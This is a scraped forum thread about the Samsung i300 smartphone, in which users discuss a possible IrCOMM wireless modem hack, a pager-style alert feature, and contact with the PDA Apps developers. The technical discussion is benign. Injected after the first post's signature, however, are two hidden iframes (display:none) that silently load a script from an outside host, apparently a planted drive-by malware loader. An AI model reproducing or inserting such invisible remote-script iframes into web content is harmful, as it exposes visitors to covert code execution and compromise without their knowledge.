+ Reply to Thread
    smartphonecentral.com

IR modem (small update)

I wrote the PDA Apps folks (developers of the vibrate alert hack) thanking them for their hack and asking about future projects.

I specifically mentioned the possibility of using the IR port as a wireless (IRCOMM) modem, previously thought impossible (still may be). They said they'd look into it.

They also said they'd be interested in hearing about other development needs for the i300, so, if anybody wants to e-mail them, feel free.

--Jesse<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think that someone from PDA apps has joined the forum. (see the thread regarding Vibrating Palm Alarms). If you are listening, welcome. Anyway to have beep every so often if there is an outstanding text message/page or voice mail? I'd like it to work like a pager. (beep every 2 minutes until you ack that there is a page). Even the LCD blinking would be an improvement.
    Carl

Originally posted by CarlGalgano
    I think that someone from PDA apps has joined the forum. (see the thread regarding Vibrating Palm Alarms). If you are listening, welcome. Anyway to have beep every so often if there is an outstanding text message/page or voice mail? I'd like it to work like a pager. (beep every 2 minutes until you ack that there is a page). Even the LCD blinking would be an improvement.
    May I please chime in agreeing that this is my number 1 need (I think).

Administrator

Arrow

if the pda apps guy (gal) wants to work with us in our requests, they should step up to the plate and make themselves to be known what they can and cant do. they should start a thread and talk about who they are... lets keep this forum clean and uncluttered and post all topics relating the the pda apps guy (gal) in one post.

ir port

This IR port idea is great and would love to know if and when it is possible.

Re: ir port

Originally posted by psych
    This IR port idea is great and would love to know if and when it is possible.
    There are several theoretical ways to accomplish this, but the easiest way would be to install the serial modem driver for the phone that comes with the data communication kit. Set it up to use the Ir serial port on the client pc (laptop) and you've got the client side worked out, no original programming required.

Then comes the trick -- you need to create a Palm app that accepts serial connections on the Ir port and handles them in the same way that serial connections on the phone's base connector are handled now. This would probably take the form of a hack rather than an app per se. It wouldn't appear to be a difficult programming job -- you have to fool the Samsung modem interface into accepting serial data via IrComm as if it were coming from the physical port. Unless I'm missing something, a small but crucial amount of i300-specific information would be needed to bridge this particular gap. As Samsung would not appear to be forthcoming with this information, it sounds like a little reverse-engineering would be involved here.

Finally of course, you'd have to be able to legally distribute the client-side modem driver to people who haven't bought the data connectivity kit. Unless you wanted to A) recreate it yourself or B) oblige people to buy the hardware connectivity kit merely to get the driver.

All of which begs the question: if the data connectivity kit supports cable only and won't use Ir.... why on earth not? It would have been simple for Samsung to do it. Grumble.

Re: Re: ir port

Come to think of it, it may be possible to make a simplifying assumption: I haven't checked, but it seems likely that to the PC, the phone looks like a generic serial modem -- I believe that was the case with my last CDMA-based phone. If so, there wouldn't be any driver issues.

To the PC it looks like a Palm Pilot.

In modem term we have two DTE devices... Of course the serial port manages it...
    Light a man a fire, keep him warm a day.
    Light a man on fire, keep him warm the rest of his life.